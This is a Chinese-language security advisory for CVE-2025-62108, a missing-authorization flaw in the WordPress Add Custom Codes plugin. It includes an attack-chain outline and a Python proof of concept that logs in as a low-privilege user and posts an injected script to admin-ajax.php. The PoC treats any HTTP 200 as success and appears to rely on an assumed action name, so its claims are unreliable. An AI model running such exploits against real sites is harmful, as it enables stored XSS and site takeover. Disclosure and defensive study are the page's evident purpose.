CVE-2025-62108 WordPress Add Custom Codes插件缺失授权漏洞

漏洞信息

漏洞编号

CVE-2025-62108

漏洞类型

访问控制缺失

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SaifuMak Add Custom Codes (WordPress插件)

漏洞概述

CVE-2025-62108是WordPress插件Add Custom Codes中的一个高危安全漏洞，由PatchStack团队发现。该漏洞属于Missing Authorization（缺失授权）类型，存在于插件的访问控制机制中。由于插件对某些敏感功能的访问权限验证不足，低权限用户（如订阅者角色）可能能够执行本应仅限管理员或高级用户才能使用的功能。这种访问控制配置错误允许攻击者绕过正常的权限检查，执行越权操作，可能导致网站配置被篡改、恶意代码注入或敏感信息泄露。该漏洞影响插件4.80及以下所有版本，CVSS评分5.4，属于中等严重程度。

技术细节

该漏洞的根本原因在于Add Custom Codes插件的访问控制检查机制存在缺陷。插件在处理用户请求时，未正确验证用户是否具有执行特定操作（如添加自定义代码）的权限。在WordPress的权限体系中，添加自定义代码（特别是涉及header/footer或功能代码的功能）应当仅限管理员角色访问。然而，由于插件在关键函数调用前缺少current_user_can()或类似权限检查，低权限认证用户可以通过构造特定的AJAX请求或直接访问管理接口来实现越权操作。攻击者可能利用此漏洞在网站前端注入任意HTML/JavaScript代码，或修改网站核心功能文件，对网站安全和用户数据造成威胁。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标WordPress网站并检测Add Custom Codes插件版本（<=4.80），通过查看页面源代码或使用wpscan等工具枚举插件版本

STEP 2

认证阶段

攻击者获取目标网站的低权限账户（如订阅者角色），或通过其他方式（如弱密码、用户枚举）获得有效凭据

STEP 3

漏洞利用

攻击者构造针对插件admin-ajax.php或admin-post.php端点的恶意请求，由于插件缺少current_user_can()权限检查，低权限用户可成功提交自定义代码

STEP 4

载荷执行

恶意代码（JavaScript/HTML）被保存并在前端页面执行，可能导致存储型XSS攻击、会话劫持或进一步横向移动

STEP 5

持久化控制

攻击者可能利用此漏洞进一步修改网站配置，注入后门或窃取管理员权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-62108 PoC - Broken Access Control in Add Custom Codes Plugin
# Target: WordPress site with vulnerable Add Custom Codes plugin <= 4.80

target = "http://target-wordpress-site.com"
username = "low_privilege_user"
password = "user_password"

def exploit_cve_2025_62108():
    """
    This PoC demonstrates the broken access control vulnerability in Add Custom Codes plugin.
    The plugin fails to properly check user capabilities before allowing custom code modifications.
    """
    session = requests.Session()
    
    # Step 1: Login with low privilege account
    login_url = f"{target}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed")
        return False
    
    print("[+] Successfully logged in with low privilege account")
    
    # Step 2: Exploit broken access control to add custom code
    # The plugin's admin-ajax.php or admin-post.php endpoint lacks capability check
    exploit_url = f"{target}/wp-admin/admin-ajax.php"
    
    # Malicious payload - inject arbitrary JavaScript
    exploit_data = {
        'action': 'add_custom_codes_save',
        'code_type': 'header',
        'custom_code': '<script>alert("XSS via Broken Access Control")</script>',
        'nonce': ''  # Some versions may not require nonce validation
    }
    
    response = session.post(exploit_url, data=exploit_data)
    
    if response.status_code == 200:
        print("[+] Exploit sent - Access control bypass successful")
        print("[+] Malicious code may have been saved to the site")
        return True
    else:
        print("[-] Exploit failed or access was blocked")
        return False

if __name__ == "__main__":
    print("CVE-2025-62108 - Add Custom Codes Plugin Broken Access Control")
    exploit_cve_2025_62108()

影响范围

Add Custom Codes <= 4.80

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1）限制用户注册功能，防止未知低权限用户创建账户；2）使用.htaccess或Nginx配置限制admin-ajax.php的访问来源；3）暂时禁用Add Custom Codes插件，使用其他安全方式管理自定义代码；4）加强WordPress网站的访问日志监控，及时发现异常越权访问行为。